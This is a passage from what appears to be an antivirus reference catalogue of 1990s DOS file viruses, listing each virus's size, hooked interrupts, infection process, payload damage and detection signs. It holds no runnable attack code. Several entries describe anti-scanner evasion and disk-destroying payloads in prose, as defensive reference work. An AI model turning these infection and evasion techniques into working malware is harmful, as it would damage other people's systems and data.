  12198. Virus infects .COM  programs when they are executed. Infected
  12199. files will have a file length increase of 730 bytes with the
  12200. virus being located at the end of the file. Virus updates the
  12201. first 7 bytes, makes the file head point to the virus code, and
  12202. reserves the first 7 bytes at the end of the infected file.
  12203.  
  12204. Damage: Increased file sizes. Decreased available memory.
  12205.  
  12206. Symptoms: Available free memory will decrease by 720 bytes.
  12207.  
  12208. [Red Spider]
  12209. Virus Name: RED SPIDER
  12210. Virus Type: File Virus
  12211.             Virus infects .COM files that are between 2,000
  12212.             (7D0H) and 63,500 (F80CH) bytes in length. Infect
  12213.             .EXE files that are smaller than 524,288 (80000H)
  12214.             byte. Virus is a Memory Block Resident.
  12215. Virus Length: 949-964 bytes (file)
  12216.  
  12217. PC Vectors Hooked: INT 21h
  12218.  
  12219. Infection Process:
  12220. Virus stays resident at the top of the MCB (memory control block)
  12221. but below the DOS 640k boundary. Virus infects .EXE and .COM
  12222. programs when they are executed. Infected files will have a file
  12223. length increase of 949 - 964 bytes with the virus being located
  12224. at the end of the file.
  12225.  
  12226. Damage: Increased file sizes.  Decreased available memory.
  12227.  
  12228. Symptoms: The available free memory decreases by 976 bytes.
  12229.  
  12230. Note: If COMMAND.COM is infected, the file length will not
  12231. change. This virus will not infect. The following text strings
  12232. can be found encrypted in the virus code:
  12233.  
  12234.     "Red Spider Virus created by Garfield from Zielona Gora in
  12235.      Feb 1993 ....... "
  12236.  
  12237. [Hello Shshtay]
  12238. Virus Name: HELLO-SHSHTAY
  12239. Virus Type: File Virus
  12240.             Virus infects .COM files shorter than 63,776 bytes and
  12241.             .EXE files shorter than 52,428 bytes. Virus is a
  12242.             Memory Block Resident.
  12243. Virus Length: 1,840-1,855 bytes (EXE), 1,600-1615 bytes (COM),
  12244.               1792 bytes (memory)
  12245. PC Vectors Hooked: INT 21h
  12246.  
  12247. Infection Process:
  12248. Virus stays resident at the top of the MCB (memory control block)
  12249. but below the DOS 640k boundary. The available free memory
  12250. decreases by 1792 bytes. Virus infects .EXE and .COM programs
  12251. when they are executed. Infected .EXE files will have a file
  12252. length increase of 1840-1855 bytes and infected .COM files will
  12253. have a file length increase of 1600-1615 bytes with the virus
  12254. being located at the end of the file in both cases.
  12255.  
  12256. Damage: Increased file sizes.  Decreased available memory.
  12257.  
  12258. Symptoms: Virus displays the following messages:
  12259.  
  12260.         "HELLO SHSHTAY"
  12261.         "GODBYE AMIN "
  12262.         "HELLO SHSHTAY"
  12263.         " ZAGAZIG UNIV"
  12264.  
  12265. Note: If the system date is greater than or equal to January,
  12266. 1994, it will hook INT 1Ch, INT 09h and set a counter = 0.
  12267. Interrupt 1ch will add one to the counter 18.2 times every second
  12268. and when the counter is greater than or equal to 3786 (ECAh) it
  12269. will trigger INT 09h and reset the counter back to 0. When
  12270. Interrupt 09h is activated, it will put a message into the
  12271. keyboard buffer, so around every 208 (3786/18.2) seconds, the
  12272. screen will display one message in turn from the above list.
  12273.  
  12274. [Star Dot]
  12275. Virus Name: STARDOT
  12276. Virus Type: File Virus (EXE files)
  12277. Virus Length: 592-608 bytes (file)
  12278.  
  12279. PC Vectors Hooked: INT 21h
  12280.  
  12281. Infection Process:
  12282. Virus only infects .EXE programs when they are executed. There
  12283. will be a file length increase of 592 - 608 bytes  with the virus
  12284. being located at the end of the file. When the virus infects
  12285. another clean program, it adds a counter and writes the value and
  12286. virus body into a clean program, so the virus will get the day of
  12287. the week and compare with the lowest 3 bits of the counter. If
  12288. the values are equal, it will randomly destroy the current disk
  12289. sector 8 times. If the counter value is equal to 63 (3Fh), it
  12290. will send the random data to the system I/O port (from 380h to 3DFh).
  12291.  
  12292. Damage: Virus destroys current disk sector and sends random data
  12293. to the system I/O port.
  12294.  
  12295. Symptoms: Data loss on the disk and increased file sizes.
  12296.  
  12297. [Stunning Blow]
  12298. Virus Name: STUNNING BLOW
  12299. Virus Type: File Virus
  12300.             Virus infects .EXE files not starting with the following
  12301.             letters: "TB","F-","CP","NA","SC","CL","V." Virus is a
  12302.             Memory Block Resident.
  12303. Virus Length: 1237 bytes (file), 1392 bytes (memory)
  12304.  
  12305. PC Vectors Hooked: INT 21h
  12306.  
  12307. Infection Process:
  12308. This virus will activate on the 4, 8, 12, 16, 20, 24, and 28  of
  12309. each month, after the initial delay period of one month.  Upon
  12310. activation the virus will:
  12311. (1) Hook interrupt 08h, counter = FFD0h
  12312. (2) Decrease the counter by 18.2 every second, and
  12313. (3) When the counter reaches zero it will start to play music on
  12314.     the speaker. This virus also activates when a random seed =
  12315.     -1, and it will display the following message:
  12316.  
  12317.     " Stunning Blow (R) Ghost Player Italy."
  12318.  
  12319. Damage: Virus deletes *.CPS files.
  12320.  
  12321. Symptoms: Loss of some files named *.CPS and increased file
  12322. sizes. Decreased available memory.
  12323.  
  12324. [Sunrise]
  12325. Virus Name: SUNRISE
  12326. Virus Type: File Virus (EXE files)
  12327. Virus Length: 1033 bytes (file), 80 bytes (memory)
  12328.  
  12329. PC Vectors Hooked: INT 21h
  12330.  
  12331. Infection Process:
  12332. From the root directory of the current disk, the virus searches for
  12333. the last subdirectory then changes to that subdirectory and all
  12334. subsequent last subdirectories. The virus then searches to infect an
  12335. uninfected *.EXE file. The virus checks the disk serial number. If the
  12336. number is equal to zero and one memory word is equal to 2Dh, it will
  12337. display the following message:
  12338.  
  12339.     "* Sun Rise * EpidemicWare G.I.P.Po oct-93."
  12340.  
  12341. Interrupt 08h will be hooked: If the month when the executed file
  12342. was infected is not equal to the current month, the virus will
  12343. hook int 08h, which will:
  12344.   (i) Be resident at the top of the memory but below the 640k
  12345.       boundary.
  12346.  (ii) Decrease available memory by 80 bytes.
  12347. (iii) Assign a value of BDD8h to a counter and decrease the counter
  12348.       by 18.2 every second. When the counter reaches zero the
  12349.       screen will blank out and the original screen contents will
  12350.       then scroll up. After this, the system returns to normal
  12351.       operation.
  12352.  (iv) Assign a value of 1518h to the counter and repeat steps (ii),
  12353.       (iii) and (iv).
  12354.  
  12355. Damage: Virus hooks int 8h and at certain intervals the screen
  12356. goes blank and scrolls up.
  12357.  
  12358. Symptoms: Increased file sizes.  Decreased available memory.
  12359.  
  12360. [Thule]
  12361. Virus Name: THULE
  12362. Virus Type: File Virus
  12363.             Virus infects .COM files shorter than 61,054 bytes.
  12364.             Virus is a Memory Block Resident.
  12365. Virus Length: 309 (COM files), 68 bytes (memory)
  12366.  
  12367. PC Vectors Hooked: INT 21h
  12368.  
  12369. Infection Process:
  12370. This virus will move the virus code to 0:200h-0:243h and hook int 21h
  12371. in order to delete a file named "THULE.COM."  When DOS changes
  12372. the current directory, it will try to open "THULE.COM" on the
  12373. current directory. When found, this file will be deleted.
  12374.  
  12375. Damage: The file named "THULE.COM" will be deleted.
  12376.  
  12377. Symptoms: Increased file sizes. A file is deleted.
  12378.  
  12379. [Topa 1.20]
  12380. Virus Name: TOPA 1.20
  12381. Virus Type: File Virus
  12382.             Virus infects .COM files between 2712 and 60000
  12383.             bytes. Infects .EXE files between 5424 and 524288
  12384.             bytes.  Virus is a Memory Block Resident.
  12385. Virus Length: 2456-2471 bytes (EXE files), 2456 bytes (COM files),
  12386.               5536 bytes (memory)
  12387.  
  12388. PC Vectors Hooked: INT 1Ch, INT 21h
  12389.  
  12390. Infection Process:
  12391. This virus is spread by executing an infected program. When a
  12392. TOPA_1.2 infected program is executed, it will check to see if
  12393. AX= 4290h, INT 21 and return AX = 9047 indicate it is already
  12394. resident in the memory. If it is, the virus will execute the
  12395. infected program. If not, the virus will perform the following:
  12396. 1) It will change memory allocate strategy to low memory last
  12397.    fit, then stay resident at the MCB (memory control block). The
  12398.    available free memory will decrease by 5536 (15A0H) bytes.
  12399. 2) Once the TOPA_1.2 virus is memory resident, it will hook int
  12400.    1Ch and int 21h in order to infect files.
  12401.  
  12402. Damage: Decreased available memory.
  12403.  
  12404. Symptoms: Increased file sizes.
  12405.  
  12406. [Topo]
  12407. Virus Name: TOPO
  12408. Virus Type: File Virus
  12409.             Virus infects .EXE files shorter than 524288 bytes.
  12410.             Virus is a Memory Block Resident.
  12411. Virus Length: 1536-1552 bytes (file), 3616 bytes (memory)
  12412.  
  12413. PC Vectors Hooked: INT 21h
  12414.  
  12415. Infection Process:
  12416. This virus is spread by executing an infected program. When a
  12417. TOPO infected program is executed, first it will hook INT 3 then
  12418. use this interrupt to deceive the virus body.  The virus will
  12419. then check to see if it is already resident in the memory by
  12420. checking if address 0:3feh contains the value 0011h. If the virus
  12421. is already in the memory it will execute the infected program. The
  12422. virus will not include files named: *AN.EXE and *LD.EXE, with "*"
  12423. being a wild card.
  12424.  
  12425. Damage: Virus destroys the diskette parameter (00:525h - 0:52Ch) and
  12426. displays the following message:
  12427.  
  12428.     "R(etry), I(gnore), F(ail), or A(bort) ?"
  12429.  
  12430. Symptoms: Increased file sizes and the inability to read certain
  12431. files. Decreased available memory.
  12432.  
  12433. Note: If the system date is equal to 25 or 26 of any month,
  12434. the above message will appear.
  12435.  
  12436. [Bloody Warrior]
  12437. Virus Name:  BLOODY-WARRIOR
  12438. Virus Type:  Resident at the top of the MCB
  12439.              (memory control block)
  12440. Virus Length: 1344 bytes (file), 2768 bytes (memory)
  12441.  
  12442. PC Vectors Hooked:
  12443.  
  12444. Execution Procedure:
  12445. The virus infects COM and EXE files as long as the COM file is
  12446. smaller than EA60h bytes. It will not infect the following
  12447. files: "SCAN", "STOP", "SHIELD", "CLEAN", "CV", "DEBUG", "TD."
  12448. This virus can only spread by executing an infected program.
  12449.  
  12450. Damage:
  12451. The virus destroys the disk sector from sector 1 to 256. By progressive
  12452. action: it will write garbage to the current disk from sectors 1
  12453. to 256 when it is the fourth or later in the month of July.
  12454.  
  12455. Detection method:
  12456. Infected files increase by 1344 bytes.
  12457.  
  12458. Symptoms:
  12459. When a BLOODY-WARRIOR infected program is executed it will be:
  12460. 1. Resident at the top of the system memory but below the 640k DOS
  12461.    boundary. The available free memory will decrease by 2768 bytes.
  12462. 2. Interrupt 21h will be hooked: When the BLOODY-WARRIOR virus is
  12463.    memory resident, in order to infect the files the virus will
  12464.    control the following functions:
  12465.         - loading and executing (AX=4B00h)
  12466.         - opening (AH=3Dh)
  12467.         - get and set file attribute (AH=43h)
  12468.         - rename a file (AH = 56h)
  12469.    It will infect EXE and COM files when they are executed, opened,
  12470.    when getting file attributes, or when renaming files.  But it
  12471.    will not infect COM files if the length is greater than EA60h
  12472.    bytes. Infected programs will have a file length increase of
  12473.    1344 bytes with the virus being located at the end of the
  12474.    file. If file header is : "SCAN","STOP", "SHIELD", "CLEAN",
  12475.    "CV", "DEBUG", or "TD" the virus will not infect these files
  12476.    but will instead restore int 21h to the original interrupt
  12477.    vector so these files will not be able to detect the virus.
  12478. 3. This virus will only activate in July, when the date is the
  12479.    4th or later. It will write garbage to the current disk from
  12480.    sectors 1 to 256. The garbage data includes the follow message"
  12481.  
  12482.  
  12483.                "Hello, world!
  12484.                I am the Bloody Warrior.
  12485.                Nice to meet you.
  12486.                What about this virus ? Funny ?
  12487.                There is no hope for you.
  12488.                This virus was released in Milan
  12489.                1993."
  12490.  
  12491. Note: There is a possibility of detection when using DOS commands.
  12492.  
  12493. [17690]
  12494. Virus Name: 17690
  12495. Virus Type: File Virus (EXE files)
  12496. Virus Length:  17,690 bytes
  12497.  
  12498. Execution Procedure:
  12499. 1) There is a 10% chance that the virus will infect a file. The
  12500.    method of infection is: virus searches for an EXE file on
  12501.    diskette A. Then renames this file and creates a new COM file
  12502.    with the same name as the original EXE file. This new COM
  12503.    file is the virus.
  12504. 2) When the virus does not infect files, it will execute the program
  12505.    that has been renamed. User will not see any unusual
  12506.    manifestation.
  12507.  
  12508. Damage: None
  12509.  
  12510. Detection method: Infected files increase by 17,690 bytes.
  12511.  
  12512. [Fish 1100]
  12513. Virus Name: Fish-1100
  12514. Virus Type: File Virus (COM files)
  12515. Virus Length:  1100 bytes
  12516.  
  12517. PC Vectors Hooked: INT 21h, INT 24h
  12518.  
  12519. Execution Procedure:
  12520. 1) Checks whether it is memory resident. If not, it loads itself
  12521.    resident in the high memory.
  12522. 2) Hooks INT 21h and goes back to the original routine.
  12523.  
  12524. Infection Procedure:
  12525. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  12526.    prevent divulging its trace when writing. If the program to be
  12527.    executed is an uninfected COM file, the virus proceeds to infect it.
  12528.  
  12529. Damage: None
  12530.  
  12531. Detection method: Infected files increase by 1100 bytes.
  12532.  
  12533. [Fish 2420]
  12534. Virus Name: Fish-2420
  12535. Virus Type: File Virus (COM files)
  12536. Virus Length:  2420 bytes
  12537.  
  12538. PC Vectors Hooked: INT 21h, INT 24h
  12539.  
  12540. Execution Procedure:
  12541. 1) Checks whether it is memory resident. If not, it loads itself
  12542.    resident in the high memory.
  12543. 2) Hooks INT 21h and goes back to the original routine.
  12544.  
  12545. Infection Procedure:
  12546. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  12547.    prevent divulging its trace when writing. If the program to be
  12548.    executed is an uninfected COM file, the virus proceeds to infect it.
  12549.  
  12550. Damage: None
  12551.  
  12552. Detection method: Infected files increase by 2420 bytes.
  12553.  
  12554. [Small 178]
  12555. Virus Name: Small-178
  12556. Virus Type: File Virus (COM files)
  12557. Virus Length:  178 bytes
  12558.  
  12559. PC Vectors Hooked: INT 21h
  12560.  
  12561. Execution Procedure:
  12562. 1) Checks whether it is memory resident. If not, it loads itself
  12563.    resident in the high memory.
  12564. 2) Hooks INT 21h and goes back to the original routine.
  12565.  
  12566. Infection Procedure:
  12567. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12568.    is an uninfected COM file, the virus proceeds to infect it.
  12569.  
  12570. Damage: None
  12571.  
  12572. Note: An error message appears when writing because INT 24h has not
  12573. been hanged.
  12574.  
  12575. Detection method: Infected files increase by 178 bytes.
  12576.  
  12577. [Shiny-Happy]
  12578. Virus Name: Shiny-Happy
  12579. Virus Type: File Virus (EXE files)
  12580. Virus Length:  921 bytes
  12581.  
  12582. PC Vectors Hooked: INT 21h
  12583.  
  12584. Execution Procedure:
  12585. 1) Checks whether it is memory resident. If not, it loads itself
  12586.    resident in the high memory.
  12587. 2) Hooks INT 21h and goes back to the original routine.
  12588.  
  12589. Infection Procedure:
  12590. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  12591.    executed is an uninfected EXE file, the virus proceeds to infect it.
  12592.  
  12593. Damage: None
  12594.  
  12595. Detection method: Infected files increase by 921 bytes.
  12596.  
  12597. [Sucker]
  12598. Virus Name: Sucker
  12599. Virus Type: File Virus (EXE files)
  12600. Virus Length:  572 bytes
  12601.  
  12602. PC Vectors Hooked: INT 21h
  12603.  
  12604. Execution Procedure:
  12605. 1) Checks whether it is memory resident. If not, it loads itself
  12606.    resident in the high memory.
  12607. 2) Hooks INT 21h and goes back to the original routine.
  12608.  
  12609. Infection Procedure:
  12610. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12611.    is an uninfected EXE file, the virus proceeds to infect it.
  12612.  
  12613. Damage: None
  12614.  
  12615. Note:
  12616. 1) An error message appears when writing because INT 24h has not been
  12617.    hanged.
  12618. 2) This virus can be cleared with Soft-Mice. Virus will make a
  12619.    mistake in clearing SUCKER.CO..
  12620.  
  12621. Detection method: Infected files increase by 572 bytes.
  12622.  
  12623. [Data-Rape-2.0]
  12624. Virus Name: Data-Rape-2.0
  12625. Virus Type: File Virus (COM and EXE files)
  12626. Virus Length:  1875-1890 bytes
  12627.  
  12628. PC Vectors Hooked: INT 21h
  12629.  
  12630. Execution Procedure:
  12631. 1) Checks whether it is memory resident. If not, it loads itself
  12632.    resident in the high memory.
  12633. 2) Hooks INT 21h and goes back to the original routine.
  12634.  
  12635. Infection Procedure:
  12636. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12637.    is an uninfected COM or EXE file, the virus proceeds to infect it.
  12638.  
  12639. Damage: None
  12640.  
  12641. Detection method: Infected files increase by 1875-1890 bytes.
  12642.  
  12643. [Flagyll]
  12644. Virus Name: Flagyll
  12645. Virus Type: File Virus (EXE files)
  12646. Virus Length:
  12647.  
  12648. PC Vectors Hooked: INT 21h
  12649.  
  12650. Execution Procedure:
  12651. 1) Checks whether it is memory resident. If not, it loads itself
  12652.    resident in the high memory.
  12653. 2) Hooks INT 21h and goes back to the original routine.
  12654.  
  12655. Infection Procedure:
  12656. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12657.    is an uninfected EXE file, the virus proceeds to infect it.
  12658.  
  12659. Damage: It overwrites the original files with the virus code, thus
  12660. corrupting the files.
  12661.  
  12662. Note: An error message appears when writing because INT 24h has not
  12663. been hanged.
  12664.  
  12665. [X-3B]
  12666. Virus Name: X-3B
  12667. Virus Type: File Virus (COM and EXE files)
  12668. Virus Length:  1060 bytes
  12669.  
  12670. PC Vectors Hooked: INT 21h
  12671.  
  12672. Execution Procedure:
  12673. 1) Checks whether it is memory resident. If not, it loads itself
  12674.    resident in the high memory.
  12675. 2) Hooks INT 21h and goes back to the original routine.
  12676.  
  12677. Infection Procedure:
  12678. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12679.    is an uninfected COM or EXE file, the virus proceeds to infect it.
  12680.  
  12681. Damage: None
  12682.  
  12683. Detection method: Infected files increase by 1060 bytes.
  12684.  
  12685. [Math-Test]
  12686. Virus Name: Math-Test
  12687. Virus Type: File Virus (COM and EXE files)
  12688. Virus Length:  1136 bytes
  12689.  
  12690. PC Vectors Hooked: INT 21h
  12691.  
  12692. Execution Procedure:
  12693. 1) Checks whether it is memory resident. If not, it loads itself
  12694.    resident in the high memory.
  12695. 2) Hooks INT 21h and goes back to the original routine.
  12696.  
  12697. Infection Procedure:
  12698. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12699.    is an uninfected COM or EXE file, the virus proceeds to infect it.
  12700.  
  12701. Damage: None
  12702.  
  12703. Note: An error message appears when writing because INT 24h has not
  12704. been hanged.
  12705.  
  12706. Detection method: Infected files increase by 1136 bytes.
  12707.  
  12708. [Not-586]
  12709. Virus Name: Not-586
  12710. Virus Type: File Virus (COM files)
  12711. Virus Length:  586 bytes
  12712.  
  12713. PC Vectors Hooked: INT 21h, INT 24h
  12714.  
  12715. Execution Procedure:
  12716. 1) Checks whether it is memory resident. If not, it loads itself
  12717.    resident in the high memory.
  12718. 2) Hooks INT 21h and goes back to the original routine.
  12719.  
  12720. Infection Procedure:
  12721. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  12722.    prevent divulging its trace when writing. If the program to be
  12723.    executed is an uninfected COM file, the virus proceeds to infect it.
  12724.  
  12725. Damage: None
  12726.  
  12727. Detection method: Infected files increase by 586 bytes.
  12728.  
  12729. [Xoana]
  12730. Virus Name: Xoana
  12731. Virus Type: File Virus (EXE files)
  12732. Virus Length:  1670 bytes
  12733.  
  12734. PC Vectors Hooked: INT 21h
  12735.  
  12736. Execution Procedure:
  12737. 1) Checks whether it is memory resident. If not, it loads itself
  12738.    resident in the high memory.
  12739. 2) Hooks INT 21h and goes back to the original routine.
  12740.  
  12741. Infection Procedure:
  12742. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12743.    is an uninfected EXE file, the virus proceeds to infect it.
  12744.  
  12745. Damage: None
  12746.  
  12747. Note: An error message appears when writing because INT 24h has not
  12748. been hanged.
  12749.  
  12750. Detection method: Infected files increase by 1670 bytes.
  12751.  
  12752. [Pit-1228]
  12753. Virus Name: Pit-1228
  12754. Virus Type: File Virus (COM and EXE files)
  12755. Virus Length:  1228 bytes
  12756.  
  12757. PC Vectors Hooked: INT 21h, INT 24h
  12758.  
  12759. Execution Procedure:
  12760. 1) Checks whether it is memory resident. If not, it loads itself
  12761.    resident in the high memory.
  12762. 2) Hooks INT 21h and goes back to the original routine.
  12763.  
  12764. Infection Procedure:
  12765. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  12766.    prevent divulging its trace when writing. If the program to be
  12767.    executed is an uninfected COM or EXE file, the virus proceeds to
  12768.    infect it.
  12769.  
  12770. Damage: None
  12771.  
  12772. Detection method: Infected files increase by 1228 bytes.
  12773.  
  12774. [Finnish-357]
  12775. Virus Name: Finnish-357
  12776. Virus Type: File Virus (COM files)
  12777. Virus Length:  709 BYTES
  12778.  
  12779. PC Vectors Hooked: INT 21h
  12780.  
  12781. Execution Procedure:
  12782. 1) Checks whether it is memory resident. If not, it loads itself
  12783.    resident in the high memory.
  12784. 2) Hooks INT 21h and checks whether COMMAND.COM that booted up the
  12785.    system is infected. If not, the virus infects it and goes back to
  12786.    the original routine.
  12787.  
  12788. Infection Procedure:
  12789. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12790.    is an uninfected COM file, the virus proceeds to infect it.
  12791.  
  12792. Detection method: Infected files increase by 709 bytes.
  12793.  
  12794. [TU-482]
  12795. Virus Name: Tu-482
  12796. Virus Type: File Virus (COM files)
  12797. Virus Length:  482 bytes
  12798.  
  12799. PC Vectors Hooked: INT 21h
  12800.  
  12801. Execution Procedure:
  12802. 1) Checks whether it is memory resident. If not, it loads itself
  12803.    resident in the high memory.
  12804. 2) Hooks INT 21h and goes back to the original routine.
  12805.  
  12806. Infection Procedure:
  12807. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12808.    is an uninfected COM file, the virus proceeds to infect it.
  12809.  
  12810. Damage: None
  12811.  
  12812. Note:
  12813. 1) An error message appears when writing because INT 24h has not been
  12814.    hanged.
  12815. 2) When the virus is executed, it jumps to the end of the program, then
  12816.    jumps back to the beginning making it difficult to locate.
  12817.  
  12818. Detection method: Infected files increase by 482 bytes.
  12819.  
  12820. [Uruk-Hai]
  12821. Virus Name: Uruk-Hai
  12822. Virus Type: File Virus (COM files)
  12823. Virus Length:  394 bytes
  12824.  
  12825. PC Vectors Hooked: INT 21h, INT 24h
  12826.  
  12827. Execution Procedure:
  12828. 1) Checks whether it is memory resident. If not, it loads itself
  12829.    resident in the high memory.
  12830. 2) Hooks INT 21h and goes back to the original routine.
  12831.  
  12832. Infection Procedure:
  12833. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  12834.    prevent divulging its trace when writing. If the program to be
  12835.    executed is an uninfected COM file, the virus proceeds to infect it.
  12836.  
  12837. Damage: None
  12838.  
  12839. Detection method: Infected files increase by 394 bytes.
  12840.  
  12841. [V-388]
  12842. Virus Name: V-388
  12843. Virus Type: File Virus (COM files)
  12844. Virus Length:  394 bytes
  12845.  
  12846. PC Vectors Hooked: INT 21h, INT 24h
  12847.  
  12848. Execution Procedure:
  12849. 1) Checks whether it is memory resident. If not, it loads itself
  12850.    resident in the high memory.
  12851. 2) Hooks INT 21h and goes back to the original routine.
  12852.  
  12853. Infection Procedure:
  12854. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  12855.    prevent divulging its trace when writing. If the program to be
  12856.    executed is an uninfected COM file that ends with INT 21(AH=4Ch),
  12857.    the virus proceeds to infect it.
  12858.  
  12859. Damage: None
  12860.  
  12861. Detection method: Infected files increase by 394 bytes.
  12862.  
  12863. [Wizard 3.0]
  12864. Virus Name: Wizard-3.0
  12865. Virus Type: File Virus (COM files)
  12866. Virus Length:  268 bytes
  12867.  
  12868. PC Vectors Hooked: INT 21h
  12869.  
  12870. Execution Procedure:
  12871. 1) Checks whether it is memory resident. If not, it loads itself
  12872.    resident in the high memory.
  12873. 2) Hooks INT 21h and goes back to the original routine.
  12874.  
  12875. Infection Procedure:
  12876. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12877.    is an uninfected COM file, the virus proceeds to infect it.
  12878.  
  12879. Damage: None
  12880.  
  12881. Note: An error message appears when writing because INT 24h has not
  12882. been hanged.
  12883.  
  12884. Detection method: Infected files increase by 268 bytes.
  12885.  
  12886. [Semtex]
  12887. Virus Name: Semtex
  12888. Virus Type: File Virus (COM files)
  12889. Virus Length:  1000 bytes
  12890.  
  12891. PC Vectors Hooked: INT 21h
  12892.  
  12893. Execution Procedure:
  12894. 1) Checks whether it is memory resident. If not, it loads itself
  12895.    resident in the high memory.
  12896. 2) Hooks INT 21h and INT 8h, then goes back to the original routine.
  12897.  
  12898. Infection Procedure:
  12899. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12900.    is an uninfected COM file, the virus proceeds to infect it.
  12901.  
  12902. Damage: None
  12903.  
  12904. Note:
  12905. 1) An error message appears when writing because INT 24h has not been
  12906.    hanged.
  12907. 2) At the beginning of an infected file, the following can be found:
  12908.  
  12909.                    MOV     BP,XXXX
  12910.                    JMP     BP
  12911.  
  12912. Detection method: Infected files increase by 1000 bytes.
  12913.  
  12914. [1720]
  12915. Virus Name: 1720
  12916. Virus Type: File Virus (COM files)
  12917. Virus Length:  1723 bytes
  12918.  
  12919. PC Vectors Hooked: INT 21h, INT 24h
  12920.  
  12921. Execution Procedure:
  12922. 1) Checks whether it is memory resident. If not, it loads itself
  12923.    resident in the high memory.
  12924. 2) Hooks INT 21h and goes back to the original routine.
  12925.  
  12926. Infection Procedure:
  12927. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  12928.    prevent divulging its trace when writing. If the program to be
  12929.    executed is an uninfected COM file, the virus proceeds to infect it.
  12930.  
  12931. Damage: None
  12932.  
  12933. Detection method: Infected files increase by 1723 bytes.
  12934.  
  12935. [Number 6]
  12936. Virus Name: Number6
  12937. Virus Type: File Virus (COM files)
  12938. Virus Length:  631 bytes
  12939.  
  12940. PC Vectors Hooked: INT 21h, INT 24h
  12941.  
  12942. Execution Procedure:
  12943. 1) Checks whether it is memory resident. If not, it loads itself
  12944.    resident in the high memory.
  12945. 2) Hooks INT 21h and goes back to the original routine.
  12946.  
  12947. Infection Procedure:
  12948. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  12949.    prevent divulging its trace when writing. If the program to be
  12950.    executed is an uninfected COM file, the virus proceeds to infect it.
  12951.  
  12952. Damage: None
  12953.  
  12954. Detection method: Infected files increase by 631 bytes.
  12955.  
  12956. [Timemark]
  12957. Virus Name: Timemark
  12958. Virus Type: File Virus (EXE files)
  12959. Virus Length:  1060-1080 bytes
  12960.  
  12961. PC Vectors Hooked: INT 21h
  12962.  
  12963. Execution Procedure:
  12964. 1) Checks whether it is memory resident. If not, it loads itself
  12965.    resident in the high memory.
  12966. 2) Hooks INT 21h and goes back to the original routine.
  12967.  
  12968. Infection Procedure:
  12969. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12970.    is an uninfected EXE file, the virus proceeds to infect it.
  12971.  
  12972. Damage: None
  12973.  
  12974. Detection method: Infected files increase by 1060-1080 bytes.
  12975.  
  12976. [Sergant]
  12977. Virus Name: Sergant
  12978. Virus Type: File Virus (COM files)
  12979. Virus Length:  108 bytes
  12980.  
  12981. PC Vectors Hooked: INT 21h
  12982.  
  12983. Execution Procedure:
  12984. 1) Checks whether it is memory resident. If not, it loads itself
  12985.    resident in the high memory.
  12986. 2) Hooks INT 21h and goes back to the original routine.
  12987.  
  12988. Infection Procedure:
  12989. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12990.    is an uninfected COM file, the virus proceeds to infect it.
  12991.  
  12992. Damage: None
  12993.  
  12994. Note: An error message appears when writing because INT 24h has not
  12995. been hanged.
  12996.  
  12997. Detection method: Infected files increase by 108 bytes.
  12998.  
  12999. [Penza]
  13000. Virus Name: Penza
  13001. Virus Type: File Virus (COM files)
  13002. Virus Length:  700 bytes
  13003.  
  13004. PC vectors Hooked: INT 21h, INT 24h
  13005.  
  13006. Execution Procedure:
  13007. 1) Checks whether it is memory resident. If not, it loads itself
  13008.    resident in the high memory.
  13009. 2) Hooks INT 21h and goes back to the original routine.
  13010.  
  13011. Infection Procedure:
  13012. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  13013.    prevent divulging its trace when writing. If the program to be
  13014.    executed is an uninfected COM file, the virus proceeds to infect it.
  13015.  
  13016. Damage: None
  13017.  
  13018. Detection method: Infected files increase by 700 bytes.
  13019.  
  13020. [Nines]
  13021. Virus Name: Nines
  13022. Virus Type: File Virus (COM files)
  13023. Virus Length:  706 or 776 bytes
  13024.  
  13025. PC Vectors Hooked: INT 21h
  13026.  
  13027. Execution Procedure:
  13028. 1) Checks whether it is memory resident. If not, it loads itself
  13029.    resident in the high memory.
  13030. 2) Hooks INT 21h and goes back to the original routine.
  13031.  
  13032. Infection Procedure:
  13033. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  13034.    is an uninfected COM file, the virus proceeds to infect it.
  13035.  
  13036. Damage: None
  13037.  
  13038. Note: An error message appears when writing because INT 24h has not
  13039. been hanged.
  13040.  
  13041. Detection method: Infected files increase by 706 or 776 bytes.
  13042.  
  13043. [Seacat]
  13044. Virus Name: Seacat
  13045. Virus Type: File Virus (COM files)
  13046. Virus Length:  1600 bytes
  13047.  
  13048. Execution Procedure:
  13049. The virus searches for an uninfected COM file on the current directory,
  13050. then infects it (only infects one file at a time).
  13051.  
  13052. Damage: None
  13053.  
  13054. Note:
  13055. 1) It does not stay resident in the memory.
  13056. 2) An error message appears when writing because INT 24h has not been
  13057.    hanged.
  13058.  
  13059. Detection method: Infected files increase by 1600 bytes.
  13060.  
  13061. [Wake]
  13062. Virus Name: Wake
  13063. Virus Type: File Virus (EXE files)
  13064. Virus Length:
  13065.  
  13066. Execution Procedure:
  13067. The virus searches for all uninfected EXE files on the current
  13068. directory, then infects them (only infects one file at a time).
  13069.  
  13070. Damage: It overwrites the original files with the virus code, thus
  13071. corrupting the files.
